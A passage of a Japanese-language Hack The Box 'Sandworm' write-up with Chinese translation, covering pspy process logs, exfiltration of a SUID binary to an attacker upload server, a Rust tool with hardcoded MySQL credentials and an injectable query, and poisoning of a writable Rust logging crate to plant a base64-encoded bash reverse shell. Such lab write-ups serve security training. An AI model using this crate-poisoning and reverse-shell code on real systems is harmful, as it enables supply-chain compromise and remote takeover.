2023/06/21 06:54:53 CMD: UID=0     PID=923    | /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0                                                                                                                            
2023/06/21 06:54:53 CMD: UID=0     PID=873    | 
2023/06/21 06:54:53 CMD: UID=0     PID=840    | 
2023/06/21 06:54:53 CMD: UID=997   PID=812    | /usr/local/sbin/laurel --config /etc/laurel/config.toml 
2023/06/21 06:54:53 CMD: UID=0     PID=809    | /sbin/auditd 
2023/06/21 06:54:53 CMD: UID=0     PID=808    | /usr/bin/vmtoolsd 
2023/06/21 06:54:53 CMD: UID=0     PID=807    | /usr/bin/VGAuthService 
2023/06/21 06:54:53 CMD: UID=102   PID=806    | /lib/systemd/systemd-timesyncd 
2023/06/21 06:54:53 CMD: UID=101   PID=805    | /lib/systemd/systemd-resolved 
2023/06/21 06:54:53 CMD: UID=0     PID=750    | /lib/systemd/systemd-udevd 
2023/06/21 06:54:53 CMD: UID=0     PID=745    | /sbin/multipathd -d -s 
2023/06/21 06:54:53 CMD: UID=0     PID=744    | 
2023/06/21 06:54:53 CMD: UID=0     PID=743    | 
2023/06/21 06:54:53 CMD: UID=0     PID=740    | 
2023/06/21 06:54:53 CMD: UID=0     PID=737    | 
2023/06/21 06:54:53 CMD: UID=0     PID=705    | /lib/systemd/systemd-journald 
2023/06/21 06:54:53 CMD: UID=0     PID=650    | 
2023/06/21 06:54:53 CMD: UID=0     PID=649    | 
2023/06/21 06:54:53 CMD: UID=0     PID=381    | 
2023/06/21 06:54:53 CMD: UID=0     PID=340    | 
2023/06/21 06:54:53 CMD: UID=0     PID=339    | 
2023/06/21 06:54:53 CMD: UID=0     PID=311    | 
2023/06/21 06:54:53 CMD: UID=0     PID=310    | 
2023/06/21 06:54:53 CMD: UID=0     PID=309    | 
2023/06/21 06:54:53 CMD: UID=0     PID=308    | 
2023/06/21 06:54:53 CMD: UID=0     PID=307    | 


...省略

2023/06/21 06:54:53 CMD: UID=0     PID=14     | 
2023/06/21 06:54:53 CMD: UID=0     PID=13     | 
2023/06/21 06:54:53 CMD: UID=0     PID=12     | 
2023/06/21 06:54:53 CMD: UID=0     PID=11     | 
2023/06/21 06:54:53 CMD: UID=0     PID=10     | 
2023/06/21 06:54:53 CMD: UID=0     PID=8      | 
2023/06/21 06:54:53 CMD: UID=0     PID=6      | 
2023/06/21 06:54:53 CMD: UID=0     PID=5      | 
2023/06/21 06:54:53 CMD: UID=0     PID=4      | 
2023/06/21 06:54:53 CMD: UID=0     PID=3      | 
2023/06/21 06:54:53 CMD: UID=0     PID=2      | 
2023/06/21 06:54:53 CMD: UID=0     PID=1      | /sbin/init maybe-ubiquity 
2023/06/21 06:55:01 CMD: UID=0     PID=42523  | /usr/sbin/CRON -f -P 
2023/06/21 06:55:01 CMD: UID=0     PID=42524  | /usr/sbin/CRON -f -P 
2023/06/21 06:55:01 CMD: UID=0     PID=42526  | /bin/cp -p /root/Cleanup/webapp.profile /home/atlas/.config/firejail/ 
2023/06/21 06:55:01 CMD: UID=0     PID=42525  | /bin/bash /root/Cleanup/clean.sh 
2023/06/21 06:55:01 CMD: UID=0     PID=42527  | /bin/cp -p /root/Cleanup/admin.json /home/atlas/.config/httpie/sessions/localhost_5000/ 
2023/06/21 06:55:03 CMD: UID=0     PID=42528  | 
2023/06/21 06:55:16 CMD: UID=0     PID=42532  | run-parts --list /etc/dhcp/dhclient-enter-hooks.d 
2023/06/21 06:55:16 CMD: UID=0     PID=42531  | /bin/sh /sbin/dhclient-script 
2023/06/21 06:55:16 CMD: UID=0     PID=42533  | systemctl is-enabled systemd-resolved 
2023/06/21 06:55:16 CMD: UID=0     PID=42534  | ip -4 addr change 10.129.34.14/255.255.0.0 broadcast 10.129.255.255 valid_lft 3600 preferred_lft 3600 dev eth0 label eth0                                                                                                                                               
2023/06/21 06:55:16 CMD: UID=0     PID=42535  | run-parts --list /etc/dhcp/dhclient-exit-hooks.d 
2023/06/21 06:55:16 CMD: UID=0     PID=42536  | /bin/sh /sbin/dhclient-script 
2023/06/21 06:55:16 CMD: UID=0     PID=42537  | /bin/sh /sbin/dhclient-script 
2023/06/21 06:55:16 CMD: UID=0     PID=42538  | ???
2023/06/21 06:55:16 CMD: UID=0     PID=42540  | /bin/sh /sbin/dhclient-script 
2023/06/21 06:55:16 CMD: UID=0     PID=42541  | /bin/sh /sbin/dhclient-script 
2023/06/21 06:55:16 CMD: UID=0     PID=42542  | /bin/sh /sbin/dhclient-script 
2023/06/21 06:55:16 CMD: UID=0     PID=42543  | mktemp 
2023/06/21 06:55:16 CMD: UID=0     PID=42544  | md5sum /run/network/isc-dhcp-v4-eth0 /run/network/isc-dhcp-v6-eth0 /run/network/ifupdown-inet-eth0 /run/network/ifupdown-inet6-eth0                                                                                                                                     
2023/06/21 06:55:16 CMD: UID=0     PID=42545  | cmp --silent /tmp/tmp.e3JfBSINNe /tmp/tmp.EExLWMvohC 
C2023/06/21 06:56:01 CMD: UID=0     PID=42548  | /usr/sbin/CRON -f -P 
2023/06/21 06:56:01 CMD: UID=0     PID=42547  | /usr/sbin/CRON -f -P 
2023/06/21 06:56:01 CMD: UID=0     PID=42551  | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 06:56:01 CMD: UID=0     PID=42549  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 06:56:01 CMD: UID=1000  PID=42552  | /usr/bin/cargo run --offline 
2023/06/21 06:56:01 CMD: UID=0     PID=42553  | /bin/sh -c sleep 10 && /root/Cleanup/clean_c.sh 
2023/06/21 06:56:01 CMD: UID=0     PID=42554  | sleep 10 
2023/06/21 06:56:01 CMD: UID=1000  PID=42555  | /usr/bin/cargo run --offline 
2023/06/21 06:56:01 CMD: UID=1000  PID=42556  | /usr/bin/cargo run --offline 
2023/06/21 06:56:01 CMD: UID=1000  PID=42558  | /usr/bin/cargo run --offline 
2023/06/21 06:56:02 CMD: UID=1000  PID=42560  | rustc -vV 
2023/06/21 06:56:11 CMD: UID=0     PID=42566  | /bin/sh -c sleep 10 && /root/Cleanup/clean_c.sh 
2023/06/21 06:56:11 CMD: UID=0     PID=42567  | /bin/rm -r /opt/crates 
2023/06/21 06:56:11 CMD: UID=0     PID=42568  | /bin/cp -rp /root/Cleanup/crates /opt/ 
2023/06/21 06:56:11 CMD: UID=0     PID=42569  | /usr/bin/chmod u+s /opt/tipnet/target/debug/tipnet 
c2023/06/21 06:58:01 CMD: UID=0     PID=42574  | /usr/sbin/CRON -f -P 
2023/06/21 06:58:01 CMD: UID=0     PID=42573  | /usr/sbin/CRON -f -P 
2023/06/21 06:58:01 CMD: UID=0     PID=42575  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 06:58:01 CMD: UID=0     PID=42577  | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 06:58:01 CMD: UID=0     PID=42579  | /bin/sh -c sleep 10 && /root/Cleanup/clean_c.sh 
2023/06/21 06:58:01 CMD: UID=0     PID=42578  | /bin/sh -c sleep 10 && /root/Cleanup/clean_c.sh 
2023/06/21 06:58:01 CMD: UID=1000  PID=42580  | /usr/bin/cargo run --offline 
2023/06/21 06:58:01 CMD: UID=1000  PID=42581  | /usr/bin/cargo run --offline 
2023/06/21 06:58:01 CMD: UID=1000  PID=42582  | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro -Csplit-debuginfo=packed                                                                           
2023/06/21 06:58:01 CMD: UID=1000  PID=42584  | /usr/bin/cargo run --offline 
2023/06/21 06:58:02 CMD: UID=1000  PID=42587  | /usr/bin/cargo run --offline 
2023/06/21 06:58:11 CMD: UID=0     PID=42593  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 06:58:11 CMD: UID=0     PID=42594  | /bin/rm -r /opt/crates 
2023/06/21 06:58:11 CMD: UID=0     PID=42595  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 06:59:05 CMD: UID=1001  PID=42597  | 
2023/06/21 07:00:01 CMD: UID=0     PID=42606  | /usr/sbin/CRON -f -P 
2023/06/21 07:00:01 CMD: UID=0     PID=42605  | /usr/sbin/CRON -f -P 
2023/06/21 07:00:01 CMD: UID=0     PID=42604  | /usr/sbin/CRON -f -P 
2023/06/21 07:00:01 CMD: UID=0     PID=42607  | /usr/sbin/CRON -f -P 
2023/06/21 07:00:01 CMD: UID=0     PID=42609  | /bin/cp -p /root/Cleanup/webapp.profile /home/atlas/.config/firejail/ 
2023/06/21 07:00:01 CMD: UID=0     PID=42608  | /bin/bash /root/Cleanup/clean.sh 
2023/06/21 07:00:01 CMD: UID=0     PID=42613  | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:00:01 CMD: UID=0     PID=42612  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:00:01 CMD: UID=0     PID=42611  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:00:01 CMD: UID=0     PID=42614  | /usr/sbin/CRON -f -P 
2023/06/21 07:00:01 CMD: UID=0     PID=42616  | sleep 10 
2023/06/21 07:00:01 CMD: UID=1000  PID=42615  | /usr/bin/cargo run --offline 
2023/06/21 07:00:02 CMD: UID=1000  PID=42617  | rustc -vV 
2023/06/21 07:00:02 CMD: UID=1000  PID=42618  | /usr/bin/cargo run --offline 
2023/06/21 07:00:02 CMD: UID=1000  PID=42620  | /usr/bin/cargo run --offline 
2023/06/21 07:00:02 CMD: UID=1000  PID=42622  | /usr/bin/cargo run --offline 
2023/06/21 07:00:11 CMD: UID=0     PID=42626  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:00:11 CMD: UID=0     PID=42627  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:00:11 CMD: UID=0     PID=42628  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:00:12 CMD: UID=0     PID=42629  | /usr/bin/chmod u+s /opt/tipnet/target/debug/tipnet 
^F2023/06/21 07:02:01 CMD: UID=0     PID=42636  | /usr/sbin/CRON -f -P 
2023/06/21 07:02:01 CMD: UID=0     PID=42635  | /usr/sbin/CRON -f -P 
2023/06/21 07:02:01 CMD: UID=0     PID=42637  | 
2023/06/21 07:02:01 CMD: UID=0     PID=42638  | sleep 10 
2023/06/21 07:02:01 CMD: UID=0     PID=42639  | /usr/sbin/CRON -f -P 
2023/06/21 07:02:01 CMD: UID=0     PID=42641  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:02:01 CMD: UID=0     PID=42640  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:02:01 CMD: UID=1000  PID=42642  | /usr/bin/cargo run --offline 
2023/06/21 07:02:01 CMD: UID=1000  PID=42643  | /usr/bin/cargo run --offline 
2023/06/21 07:02:01 CMD: UID=1000  PID=42644  | /usr/bin/cargo run --offline 
2023/06/21 07:02:01 CMD: UID=1000  PID=42646  | 
2023/06/21 07:02:02 CMD: UID=1000  PID=42648  | rustc -vV 
2023/06/21 07:02:11 CMD: UID=0     PID=42652  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:02:11 CMD: UID=0     PID=42653  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:02:11 CMD: UID=0     PID=42654  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:02:11 CMD: UID=0     PID=42655  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:04:01 CMD: UID=0     PID=42661  | /usr/sbin/CRON -f -P 
2023/06/21 07:04:01 CMD: UID=0     PID=42660  | /usr/sbin/CRON -f -P 
2023/06/21 07:04:01 CMD: UID=0     PID=42662  | /usr/sbin/CRON -f -P 
2023/06/21 07:04:01 CMD: UID=0     PID=42663  | sleep 10 
2023/06/21 07:04:01 CMD: UID=0     PID=42664  | /usr/sbin/CRON -f -P 
2023/06/21 07:04:01 CMD: UID=0     PID=42666  | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:04:01 CMD: UID=1000  PID=42667  | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:04:02 CMD: UID=1000  PID=42668  | rustc -vV 
2023/06/21 07:04:02 CMD: UID=1000  PID=42669  | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro -Csplit-debuginfo=packed                                                                           
2023/06/21 07:04:02 CMD: UID=1000  PID=42671  | /usr/bin/cargo run --offline 
2023/06/21 07:04:11 CMD: UID=0     PID=42677  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:04:11 CMD: UID=0     PID=42678  | /bin/rm -r /opt/crates 
2023/06/21 07:04:11 CMD: UID=0     PID=42679  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:05:01 CMD: UID=0     PID=42683  | /usr/sbin/CRON -f -P 
2023/06/21 07:05:01 CMD: UID=0     PID=42685  | /bin/sh -c /bin/bash /root/Cleanup/clean.sh 
2023/06/21 07:05:01 CMD: UID=0     PID=42684  | /bin/sh -c /bin/bash /root/Cleanup/clean.sh 
2023/06/21 07:05:01 CMD: UID=0     PID=42686  | 
2023/06/21 07:05:01 CMD: UID=0     PID=42687  | /bin/bash /root/Cleanup/clean.sh 
2023/06/21 07:06:01 CMD: UID=0     PID=42691  | /usr/sbin/CRON -f -P 
2023/06/21 07:06:01 CMD: UID=0     PID=42690  | /usr/sbin/CRON -f -P 
2023/06/21 07:06:01 CMD: UID=0     PID=42693  | sleep 10 
2023/06/21 07:06:01 CMD: UID=0     PID=42692  | /bin/sh -c sleep 10 && /root/Cleanup/clean_c.sh 
2023/06/21 07:06:01 CMD: UID=0     PID=42696  | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:06:01 CMD: UID=0     PID=42694  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/06/21 07:06:01 CMD: UID=1000  PID=42697  | /usr/bin/cargo run --offline 
2023/06/21 07:06:02 CMD: UID=1000  PID=42698  | rustc -vV 
2023/06/21 07:06:02 CMD: UID=1000  PID=42699  | /usr/bin/cargo run --offline 
2023/06/21 07:06:02 CMD: UID=1000  PID=42701  | /usr/bin/cargo run --offline 
2023/06/21 07:06:02 CMD: UID=1000  PID=42703  | rustc -vV 
2023/06/21 07:06:11 CMD: UID=0     PID=42707  | /bin/sh -c sleep 10 && /root/Cleanup/clean_c.sh 
2023/06/21 07:06:11 CMD: UID=0     PID=42708  | /bin/rm -r /opt/crates 
2023/06/21 07:06:11 CMD: UID=0     PID=42709  | /bin/cp -rp /root/Cleanup/crates /opt/ 
2023/06/21 07:06:12 CMD: UID=0     PID=42710  | /bin/bash /root/Cleanup/clean_c.sh 
2023/06/21 07:06:23 CMD: UID=0     PID=42714  | 

こっちも色々気になるProcessがまわってる。 这里也有很多流程。
さて、Rootへの権限昇格ルートを考える必要がありそうだ。
现在,我们似乎需要考虑将权限升级到root。

Exploit検討 – 1

特段Rootに関する権限昇格は見えてこなかった。 我没有看到任何与 Root 相关的特定权限升级。
だがある程度予測はできる。以下のpspyの表示を確認する。
但在某种程度上,它是可以预测的。 检查下面的pspy显示。

2023/06/21 06:58:01 CMD: UID=1000  PID=42582  | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro -Csplit-debuginfo=packed             

何かrustでコンパイルしてそうである。 用 rust 编译的东西似乎是这样。

2023/06/21 06:56:11 CMD: UID=0     PID=42569  | /usr/bin/chmod u+s /opt/tipnet/target/debug/tipnet            

こいつも気になる。 我也对这个很好奇。
この/opt/tipnetの階層を確認する。そうすると、SUIDのついたファイルがsilentobserver@sandworm:/opt/tipnet/target/debugの階層にあることが確認できる。
查看 /opt/tipnet 此 . 然后,您可以看到 silentobserver@sandworm:/opt/tipnet/target/debug 具有 SUID 的文件位于 的层次结构中。

このファイルを確認する。そのためにこのバイナリを自身のKaliで解析する必要がある。
检查此文件。 为此,您需要在自己的 Kali 中解析此二进制文件。

ファイル転送コマンド用に以下のコマンドを叩き込んだ。
为文件传输命令键入了以下命令。

silentobserver@sandworm:/opt/tipnet/target/debug$ python3 -c "import requests;requests.post(\"http://10.10.14.114:8000/upload\",files={\"files\":open(\"/opt/tipnet/target/debug/tipnet\",\"rb\")})"

ファイルを転送するためにuploadserverを起動し、ファイルを受領した。
uploadserver 要传输文件,请启动并接收文件。

┌──(root㉿kali)-[~/work]
└─# python3 -m uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.34.14 - - [21/Jun/2023 03:46:35] [Uploaded] "tipnet" --> /root/work/tipnet
10.129.34.14 - - [21/Jun/2023 03:46:35] "POST /upload HTTP/1.1" 204 -

md5でファイル転送が完了したかどうか確認しておく。
检查文件传输是否在MD5中完成。

┌──(root㉿kali)-[~/work]
└─# md5sum tipnet          
dda029937eaee34a45b00383960fc2f5  tipnet

BOX側でも同様のコマンドを打ち込む。 在 BOX 端键入相同的命令。

silentobserver@sandworm:/opt/tipnet/target/debug$ md5sum tipnet
dda029937eaee34a45b00383960fc2f5  tipnet
silentobserver@sandworm:/opt/tipnet/target/debug$

転送は成功したようだ。続いてradare2で解析する。
转移似乎很成功。 接下来,使用 radare2 对其进行分析。

【Hack The Box】Sandworm【Writeup】
ふむ、localhost:3306へ通信できないといわれている。これはバイナリ経由でloaclなマシンのDBと通信できるのではないかと思いBOXのほうで試してみる。
好吧,据说它无法与localhost:3306通信。 我认为可以通过二进制文件与loacl机器的DB进行通信,所以我在BOX中尝试了它。

【Hack The Box】Sandworm【Writeup】
あ、'が通ったのでSQLコマンドが実行できそうですね。
哦,似乎因为 ' 传递而可以执行SQL命令。

と思ってRustで書かれているコードを確認しにいきました。
所以我去检查用 Rust 编写的代码。

main.rs
extern crate logger;
use sha2::{Digest, Sha256};
use chrono::prelude::*;
use mysql::*;
use mysql::prelude::*;
use std::fs;
use std::process::Command;
use std::io;

// We don't spy on you... much.

struct Entry {
    timestamp: String,
    target: String,
    source: String,
    data: String,
}

fn main() {
    println!("                                                     
             ,,                                      
MMP\"\"MM\"\"YMM db          `7MN.   `7MF'         mm    
P'   MM   `7               MMN.    M           MM    
     MM    `7MM `7MMpdMAo. M YMb   M  .gP\"Ya mmMMmm  
     MM      MM   MM   `Wb M  `MN. M ,M'   Yb  MM    
     MM      MM   MM    M8 M   `MM.M 8M\"\"\"\"\"\"  MM    
     MM      MM   MM   ,AP M     YMM YM.    ,  MM    
   .JMML.  .JMML. MMbmmd'.JML.    YM  `Mbmmd'  `Mbmo 
                  MM                                 
                .JMML.                               

");


    let mode = get_mode();
    
    if mode == "" {
            return;
    }
    else if mode != "upstream" && mode != "pull" {
        println!("[-] Mode is still being ported to Rust; try again later.");
        return;
    }

    let mut conn = connect_to_db("Upstream").unwrap();


    if mode == "pull" {
        let source = "/var/www/html/SSA/SSA/submissions";
        pull_indeces(&mut conn, source);
        println!("[+] Pull complete.");
        return;
    }

    println!("Enter keywords to perform the query:");
    let mut keywords = String::new();
    io::stdin().read_line(&mut keywords).unwrap();

    if keywords.trim() == "" {
        println!("[-] No keywords selected.\n\n[-] Quitting...\n");
        return;
    }

    println!("Justification for the search:");
    let mut justification = String::new();
    io::stdin().read_line(&mut justification).unwrap();

    // Get Username 
    let output = Command::new("/usr/bin/whoami")
        .output()
        .expect("nobody");

    let username = String::from_utf8(output.stdout).unwrap();
    let username = username.trim();

    if justification.trim() == "" {
        println!("[-] No justification provided. TipNet is under 702 authority; queries don't need warrants, but need to be justified. This incident has been logged and will be reported.");
        logger::log(username, keywords.as_str().trim(), "Attempted to query TipNet without justification.");
        return;
    }

    logger::log(username, keywords.as_str().trim(), justification.as_str());

    search_sigint(&mut conn, keywords.as_str().trim());

}

fn get_mode() -> String {

        let valid = false;
        let mut mode = String::new();

        while ! valid {
                mode.clear();

                println!("Select mode of usage:");
                print!("a) Upstream \nb) Regular (WIP)\nc) Emperor (WIP)\nd) SQUARE (WIP)\ne) Refresh Indeces\n");

                io::stdin().read_line(&mut mode).unwrap();

                match mode.trim() {
                        "a" => {
                              println!("\n[+] Upstream selected");
                              return "upstream".to_string();
                        }
                        "b" => {
                              println!("\n[+] Muscular selected");
                              return "regular".to_string();
                        }
                        "c" => {
                              println!("\n[+] Tempora selected");
                              return "emperor".to_string();
                        }
                        "d" => {
                                println!("\n[+] PRISM selected");
                                return "square".to_string();
                        }
                        "e" => {
                                println!("\n[!] Refreshing indeces!");
                                return "pull".to_string();
                        }
                        "q" | "Q" => {
                                println!("\n[-] Quitting");
                                return "".to_string();
                        }
                        _ => {
                                println!("\n[!] Invalid mode: {}", mode);
                        }
                }
        }
        return mode;
}

fn connect_to_db(db: &str) -> Result<mysql::PooledConn> {
    let url = "mysql://tipnet:4The_Greater_GoodJ4A@localhost:3306/Upstream";
    let pool = Pool::new(url).unwrap();
    let mut conn = pool.get_conn().unwrap();
    return Ok(conn);
}

fn search_sigint(conn: &mut mysql::PooledConn, keywords: &str) {
    let keywords: Vec<&str> = keywords.split(" ").collect();
    let mut query = String::from("SELECT timestamp, target, source, data FROM SIGINT WHERE ");

    for (i, keyword) in keywords.iter().enumerate() {
        if i > 0 {
            query.push_str("OR ");
        }
        query.push_str(&format!("data LIKE '%{}%' ", keyword));
    }
    let selected_entries = conn.query_map(
        query,
        |(timestamp, target, source, data)| {
            Entry { timestamp, target, source, data }
        },
        ).expect("Query failed.");
    for e in selected_entries {
        println!("[{}] {} ===> {} | {}",
                 e.timestamp, e.source, e.target, e.data);
    }
}

fn pull_indeces(conn: &mut mysql::PooledConn, directory: &str) {
    let paths = fs::read_dir(directory)
        .unwrap()
        .filter_map(|entry| entry.ok())
        .filter(|entry| entry.path().extension().unwrap_or_default() == "txt")
        .map(|entry| entry.path());

    let stmt_select = conn.prep("SELECT hash FROM tip_submissions WHERE hash = :hash")
        .unwrap();
    let stmt_insert = conn.prep("INSERT INTO tip_submissions (timestamp, data, hash) VALUES (:timestamp, :data, :hash)")
        .unwrap();

    let now = Utc::now();

    for path in paths {
        let contents = fs::read_to_string(path).unwrap();
        let hash = Sha256::digest(contents.as_bytes());
        let hash_hex = hex::encode(hash);

        let existing_entry: Option<String> = conn.exec_first(&stmt_select, params! { "hash" => &hash_hex }).unwrap();
        if existing_entry.is_none() {
            let date = now.format("%Y-%m-%d").to_string();
            println!("[+] {}\n", contents);
            conn.exec_drop(&stmt_insert, params! {
                "timestamp" => date,
                "data" => contents,
                "hash" => &hash_hex,
                },
                ).unwrap();
        }
    }
    logger::log("ROUTINE", " - ", "Pulling fresh submissions into database.");

}

MySQLのクレデンシャルが書かれている!やった!!!
MySQL凭据已写入! 万岁!!!

これでアクセスして情報搾取かな???  这是访问和信息利用吗???

…だがこれはウサギの穴でした。。。 … 但这是一个兔子洞……
調べてもクレデンシャル出てこない。。。  即使我查了一下,我也找不到任何凭据。

Exploit検討 – 2 漏洞利用审查 – 2

今度はこのTipNetの実行ファイルのライブラリに注目します。
现在让我们把注意力转向这个 TipNet 的可执行文件库。

extern crate logger;から/opt/crate階層にあったloggerライブラリを使っていると想定できます。
extern crate logger; 您可以假定您使用的 logger 是 /opt/crate 层次结构中的库。

さらにこの/opt/crate/logger階層はwriteableとlinpeasの出力からわかっているので此奴のライブラリを汚染します。そうすればこのtipnetの実行ファイルがatlas権限で実行できるので、atlasに移った後はそのGroupで実行できるSUIDのファイルがあったはず…
此外,这种 /opt/crate/logger 层次结构是从 writeable 和 linpeas 的输出中知道的,因此它污染了我们的库。 如果你这样做,这个 tipnet 可执行文件可以用 atlas 权限执行,所以在移动到 atlas 之后,应该有一个可以在该组中执行的 SUID 文件……

これでルート取が出来た!!!  现在你可以走这条路了!!

logger library 记录器库

とりあえずファイルを確認する。 现在检查文件。

lib.rs
extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}

コマンドをtipnet実行時に変更できるようにmain.rsから渡されるjustificationでコマンドを実行することとする。ここら辺はRust触ったことがなかったのでChatGPTさんに手伝ってもらいました。
假设该命令是使用从 tipnet 传递 main.rs 的 来执行的,以便在执行 justification 时可以更改该命令。 我从来没有在这里碰过 Rust,所以我请 ChatGPT 帮助我。

【Hack The Box】Sandworm【Writeup】

malicious rust file

上記提案を参考に、このlibraryを汚染した結果が以下の悪性ライブラリだ!
参考以上建议,污染该库的结果是以下恶性库!

※サプライチェーンしてるみたいだ。。。  * 它似乎在供应链中。

malicious.rs
extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;

use std::process::Command;

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    let output = Command::new("bash")
        .args(["-c", justification])
        .output()
        .expect("Failed to execute command");

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}

let outputにコマンド実行のコードを注入する。
let output 将命令执行代码注入到 .

このmalicious.rsをさっきのlib.rsの中身に置き換え、先ほどのpspyで確認下プロセスが回るまで待つ…
malicious.rs 将其替换为前一个的内容 lib.rs ,然后像以前一样等待 pspy 确认该过程……

libraryがコンパイルに使われたことを確認したのちに実行し、justification for the search:と表示されたときに以下のコマンドを叩き込む。
确认库已用于编译后,执行该库,并在 justification for the search: 显示时键入以下命令。

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTQvMTIzNCAwPiYx | base64 -d | /usr/bin/bash

そして以下のコマンドで待ち受けていたコンソールを確認する
然后,使用以下命令检查等待控制台

┌──(root㉿kali)-[~/work]
└─# nc -lnvp 1234
listening on [any] 1234 ...

【Hack The Box】Sandworm【Writeup】
…だめだ!!!実行ファイルのプロセスはatlasで回るのだが、bashのコマンドはsilentobserverの権限で実行されてしまう。SUIDは引き継げないなぁ。。
… 白搭!!! 可执行进程在 atlas 中运行,但 bash 命令以 silentobserver 的权限执行。 我无法接管 SUID。

次の検討に移る。 继续进行下一个考虑。

Exploit検討 – 3

以下のプロセスに注目する。 重点关注以程:

2023/06/21 07:06:01 CMD: UID=0     PID=42694  | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 

cargo runでコンパイル後に実行し、実行時の引数としてeを渡していることが分かります。
cargo run 并在运行时作为 e 参数传递。

これはtipnetバイナリのmodeの一つRefresh Indecesであることが分かります。
您可以看到这是 tipnet 二进制模式之一 Refresh Indeces 。

「あぁ…atlasでずっと回ってたじゃん…自分で回す必要ないわ。」
“啊 我已经在阿特拉斯里走了很长时间了…… 你不必自己旋转它。

そう思ったので、これで権限奪取を行います。 我就是这么想的,所以我要用它来接管权力。

malicious rust file 恶意 Rust 文件

先ほどと同じ要領でlib.rsのファイルを編集します。
以与以前相同的方式编辑 lib.rs 文件。

malicious_2.rs
extern crate chrono;

use std::process::Command;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    let output = Command::new("bash")
        .args(["-c", "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTQvNDQ0MSAwPiYx | base64 -d | bash"])
        .output()
        .expect("Failed to execute command");

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}

あとは受け側を用意して待つのみ… 剩下的就是准备接收器并等待……
【Hack The Box】Sandworm【Writeup】
来たぁあああああ!!!  我在这里,我在这里!!
しっかりProcessを見ておけばここまで遠回りすることもなかっただろう。
如果我仔细研究 Process,我就不会走这样的弯路。

Privilege Escalation – Vertical
权限提升 – 垂直

firejail 消防监狱

ここでjailerのグループで回すことが出来たSUID完備の/usr/local/bin/firejailに注目する。
这里 jailer ,我们 /usr/local/bin/firejail 关注的是一组 .

atlasはこのグループに所属しており、このコマンドを実行できる。
atlas 属于此组,可以执行此命令。

何か悪用できないかと検索すると、以下の記事が見つかった。
当我搜索可以利用的东西时,我找到了以下文章。

